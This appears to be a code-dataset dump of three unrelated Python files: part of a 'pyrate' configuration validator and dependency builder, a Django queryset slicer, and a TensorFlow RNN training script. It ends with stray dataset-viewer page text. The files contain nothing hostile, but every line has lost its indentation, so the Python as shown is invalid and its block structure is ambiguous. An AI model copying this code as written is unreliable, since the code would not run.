self.job["outputs"][o_name]["files"] = os.path.join(o_attr["path"], o_name)
for target in o_attr["targets"]:
for t_name, t_attr in target.items():
if t_attr == "all":
samples = ST.remove_duplicates(self.job["inputs"])
else:
samples = ST.get_items(target[t_name])
samples.sort()
s_names = ",".join(samples)
target[t_name] = samples
target[":".join([t_name, s_names])] = target.pop(t_name)
self.job["outputs"][o_name].update(o_attr)
# --------------------------
# Validate configuration
# --------------------------
# The configuration validation runs conservatively on all objects in the
# configuration files passed, even if they are not needed by any target.
for obj_name, obj_attr in self.job["configs"]["global"]["objects"].items():
self._validate_conf(obj_name, obj_attr)
# --------------------------
# Build dependencies
# --------------------------
# Build object dependencies to guarantee that all states are run consistently.
for obj_name, obj_attr in self.job["configs"]["global"]["objects"].items():
self._build_dependencies(obj_name, obj_attr)
# FN.pretty(self.job["configs"]["global"]["objects"])
# sys.exit()
# -----------------------
# Instantiate Run object
# -----------------------
self.run = Run(f"{self.name}_run", self.job)
self.run.setup()
def launch(self):
"""Launch Run objects. """
self.run.launch()
def _validate_conf(self, obj_name, obj_conf):
"""Checks:
1) That the configured object implements an algorithm field.
2) That the algorithm field implements a name field.
3) That alg_name corresponds to one pyrate module and one only.
4) That the module contains the definition of a class called alg_name.
5) That the states required at configuration match those implemented by the algorithm.
6) That configured states require some input or output fields.
"""
# Check 1
if not FN.check("algorithm", obj_conf):
sys.exit(
f"ERROR: object {obj_name} has no algorithm field in its configuration!"
)
# Check 2
if not FN.check("name", obj_conf["algorithm"]):
sys.exit(f"ERROR: please specify algorithm name for object {obj_name}!")
pyrate_modules = [m for m in sys.modules if "pyrate" in m]
n_alg_definitions = 0
alg_name = obj_conf["algorithm"]["name"]
states = ["initialise", "execute", "finalise"]
for m in pyrate_modules:
if alg_name == m.split(".")[-1]:
n_alg_definitions += 1
# Check 4
if not alg_name in pyclbr.readmodule(f"{m}").keys():
sys.exit(
f"ERROR: module {m} has to contain an algorithm called {alg_name}!"
)
alg_methods = pyclbr.readmodule(f"{m}")[alg_name].__dict__["children"]
# some algorithms might simply want to reimplement
# the internal methods to prepare the input, so the underscore
# has to be replaced (see Algorithm definition).
alg_methods = [a.replace("_", "") for a in alg_methods]
alg_states = set([s for s in alg_methods if s in states])
conf_states = set([s for s in states if FN.check(s, obj_conf)])
# Check 5
if not alg_states == conf_states:
sys.exit(
f"ERROR: states mismatch b/w object {obj_name} and algorithm {alg_name}!"
)
# Check 6
for s in conf_states:
if not (
FN.check("input", obj_conf[s])
or FN.check("output", obj_conf[s])
):
sys.exit(
f"ERROR: state {s} for object {obj_name} has no input or output fields defined!\nPlease add at least one of the fields"
)
# Check 3
if n_alg_definitions == 0:
e_msg = f"ERROR: while checking the configuration for {obj_name}, no suitable {alg_name} module has been found!\n"
e_msg += "1) The algorithm / module has to be added to its local __init__.py file.\n"
e_msg += "2) Make sure the name of the algorithm is written correctly.\n"
e_msg += "3) The module and the algorithm have to have the same name.\n"
sys.exit(e_msg)
elif n_alg_definitions > 1:
sys.exit(
f"ERROR: while checking the configuration for {obj_name}, {n_alg_definitions} definitions of a module called {alg_name} have been found!"
)
def _build_dependencies(self, obj_name, obj_conf):
"""Adds consistent dependencies from the global configuration."""
g_config = self.job["configs"]["global"]["objects"]
states = ["initialise", "execute", "finalise"]
for s_idx, s in enumerate(states):
prev_states = states[:s_idx]
if s in obj_conf:
if "input" in obj_conf[s]:
if not "dependency" in obj_conf:
obj_conf["dependency"] = {
"initialise": set(),
"execute": set(),
"finalise": set(),
}
for o in ST.get_items(obj_conf[s]["input"]):
if not o in g_config:
if self._is_required(o, prev_states, obj_conf):
sys.exit(
f"ERROR: {o} is required by {obj_name} for {s} but is not in the global configuration!"
)
else:
obj_conf["dependency"][s].add(o)
for ps in prev_states:
if ps in g_config[o]:
obj_conf["dependency"][ps].add(o)
# If the object relies on an initialise or finalise method, these have to put
# on the permanent store some data identifiable with the object name.
"""
if s == ["initialise", "finalise"]:
if not "output" in obj_conf[s]:
obj_conf[s]["output"] = "SELF"
else:
if not "SELF" in ST.get_items(obj_conf[s]["output"]):
obj_conf[s]["output"] += f", SELF"
"""
def _is_required(self, dep_obj_name, prev_states, obj_conf):
"""Returns False if an object is not computed upstream by an algorithm."""
if "EVENT:" in dep_obj_name:
return False
if "INPUT:" in dep_obj_name:
return False
for ps in prev_states:
if ps in obj_conf:
if "output" in obj_conf[ps]:
if dep_obj_name in ST.get_items(obj_conf[ps]["output"]):
return True
return False
# EOF
| StarcoderdataPython |
11132 | <filename>django_elastic_appsearch/slicer.py<gh_stars>10-100
"""A Queryset slicer for Django."""
def slice_queryset(queryset, chunk_size):
"""Slice a queryset into chunks."""
start_pk = 0
queryset = queryset.order_by('pk')
while True:
# No entry left
if not queryset.filter(pk__gt=start_pk).exists():
break
try:
# Fetch chunk_size entries if possible
end_pk = queryset.filter(pk__gt=start_pk).values_list(
'pk', flat=True)[chunk_size - 1]
# Fetch rest entries if less than chunk_size left
except IndexError:
end_pk = queryset.values_list('pk', flat=True).last()
yield queryset.filter(pk__gt=start_pk).filter(pk__lte=end_pk)
start_pk = end_pk
| StarcoderdataPython |
1614565 | <gh_stars>10-100
#!/bin/sh
''''exec python3 -u -- "$0" ${1+"$@"} # '''
# #! /usr/bin/env python3
# Copyright 2016 Euclidean Technologies Management LLC All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import os
import sys
import copy
import numpy as np
import tensorflow as tf
import model_utils
import configs
from tensorflow.python.platform import gfile
from batch_generator import BatchGenerator
def run_epoch(session, model, dataset,
keep_prob=1.0, passes=1.0, verbose=False):
"""Run the specified data set through the model.
Args:
session: The tf session to run graph in
model: The model. An object of type deep_rnn_model
dataset: The data. An object of type BatchGenerator
keep_prob: Dropout keep_prob for training
verbose: Display iteration output to stdout
Returns:
train_cost: average cross-entropy loss value on data
train_accy: average binary classification accuracy rate
valid_cost: average cross-entropy loss value on data
valid_accy: average binary classification accuracy rate
Raises:
RuntimeError: the batch size cannot be larger than the training
data set size
"""
num_batches = dataset.num_batches
start_time = time.time()
train_cost = train_accy = valid_cost = valid_accy = 0.0
train_evals = valid_evals = 0.0
dot_count = 0
total_steps = int(passes*num_batches)
prog_int = total_steps/100 # progress interval for stdout
if not num_batches > 0:
raise RuntimeError("batch_size*num_unrollings is larger "
"than the training set size.")
dataset.rewind() # make sure we start a beggining
print("batches: %d "%num_batches,end=' ')
for step in range(total_steps):
batch = dataset.next_batch()
(tcost, taccy, tevals,
vcost, vaccy, vevals) = model.train_step(session, batch,
keep_prob=keep_prob)
train_cost += tcost
train_accy += taccy
train_evals += tevals
valid_cost += vcost
valid_accy += vaccy
valid_evals += vevals
if ( verbose and ((prog_int<=1) or
(step % (int(prog_int)+1)) == 0) ):
dot_count += 1
print('.',end='')
sys.stdout.flush()
if verbose:
print("."*(100-dot_count),end='')
print(" passes: %.2f train iters: %d valid iters: %d "
"speed: %.0f seconds" % (passes,
train_evals,
valid_evals,
(time.time() - start_time)) )
sys.stdout.flush()
return (train_cost/train_evals,
1.0 - train_accy/train_evals,
valid_cost/valid_evals,
1.0 - valid_accy/valid_evals)
def main(_):
"""
Entry point and main loop for train_net.py. Uses command line arguments to get
model and training specification (see config.py).
"""
configs.DEFINE_string("train_datafile", None,"Training file")
configs.DEFINE_string("optimizer", 'gd', 'Optimizer to use gd, adam, adagrad, momentum')
configs.DEFINE_float("lr_decay",0.9, "Learning rate decay")
configs.DEFINE_float("initial_learning_rate",1.0,"Initial learning rate")
configs.DEFINE_float("validation_size",0.0,"Size of validation set as %")
configs.DEFINE_float("passes",1.0,"Passes through day per epoch")
configs.DEFINE_float("rnn_loss_weight",None,"How much moret to weight kth example")
configs.DEFINE_integer("max_epoch",0,"Stop after max_epochs")
configs.DEFINE_integer("early_stop",None,"Early stop parameter")
configs.DEFINE_integer("seed",None,"Seed for deterministic training")
config = configs.get_configs()
if config.train_datafile is None:
config.train_datafile = config.datafile
train_path = model_utils.get_data_path(config.data_dir,config.train_datafile)
print("Loading training data ...")
train_data = BatchGenerator(train_path, config,
config.batch_size,config.num_unrollings,
validation_size=config.validation_size,
randomly_sample=True)
tf_config = tf.ConfigProto( allow_soft_placement=True ,
log_device_placement=False )
with tf.Graph().as_default(), tf.Session(config=tf_config) as session:
if config.seed is not None:
tf.set_random_seed(config.seed)
print("Constructing model ...")
model = model_utils.get_training_model(session, config, verbose=True)
if config.early_stop is not None:
print("Training will early stop without "
"improvement after %d epochs."%config.early_stop)
train_history = list()
valid_history = list()
# This sets the initial learning rate tensor
lr = model.assign_lr(session,config.initial_learning_rate)
for i in range(config.max_epoch):
trc, tre, vdc, vde = run_epoch(session, model, train_data,
keep_prob=config.keep_prob,
passes=config.passes,
verbose=True)
trc = 999.0 if trc > 999.0 else trc
vdc = 999.0 if vdc > 999.0 else vdc
print( ('Epoch: %d loss: %.6f %.6f'
' error: %.6f %.6f Learning rate: %.4f') %
(i + 1, trc, vdc, tre, vde, lr) )
sys.stdout.flush()
train_history.append( trc )
valid_history.append( vdc )
# update learning rate
if config.optimizer == 'gd' or config.optimizer == 'momentum':
lr = model_utils.adjust_learning_rate(session, model,
lr, config.lr_decay, train_history )
if not os.path.exists(config.model_dir):
print("Creating directory %s" % config.model_dir)
os.mkdir(config.model_dir)
chkpt_file_prefix = "training.ckpt"
if model_utils.stop_training(config,valid_history,chkpt_file_prefix):
print("Training stopped.")
quit()
else:
checkpoint_path = os.path.join(config.model_dir, chkpt_file_prefix)
tf.train.Saver().save(session, checkpoint_path, global_step=i)
if __name__ == "__main__":
tf.app.run()
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.